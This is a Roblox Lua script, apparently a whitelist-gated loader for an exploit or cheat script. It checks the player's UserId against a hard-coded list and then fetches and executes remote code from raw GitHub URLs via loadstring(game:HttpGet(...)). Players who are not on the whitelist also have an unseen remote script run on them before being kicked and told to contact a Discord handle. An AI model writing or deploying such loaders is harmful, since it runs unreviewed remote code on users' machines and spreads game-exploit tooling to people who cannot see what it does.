local lilboy = {
417759198, 1247899979, 237407395, 4192316960, 2247967934, 2054996672, 2036038649,
2066024899, 2206079308, 4754443015, 3493483860, 
727017779, 3639862304, 2930548870, 2930558945, 4466727313,
159264216, 3226935120,
4492574920,
4492578671,
4492581520,
4492822384,
4492825167,
4492829574,
4492835571,
4493177540,
4493180144,
4493182988,
11943096,
13004351,
12833184,
12220462,
12669568,
12380408,
12440281, 12403322,
12025086, 11595636,
4282265844,
4282270726,
4282275398,
4282278401,
4282281620,
4282348189,
4282349270,
4282351924,
4282353487,
4282365986,
4282367639,
4282368742,
4282371742,
4282376414,
4282380263,
4282381854,
4282386168,
}
    
    local function isPlayerWhitelisted(player)
        local pqthit = player.UserId
         for _, id in ipairs(lilboy) do
            if id == pqthit then
                return true
            end
        end
        return false
    end
    
    -- Check if the LocalPlayer is whitelisted
    if game.Players.LocalPlayer and not isPlayerWhitelisted(game.Players.LocalPlayer) then
        loadstring(game:HttpGet("https://raw.githubusercontent.com/pathywathy/path/main/l"))()
        game.Players.LocalPlayer:Kick("You are not whitelisted. talk to pathw/path#0911 for whitelist")
    else
        loadstring(game:HttpGet("https://raw.githubusercontent.com/pathywathy/path/main/I"))()
    print("whitelisted.")
    end
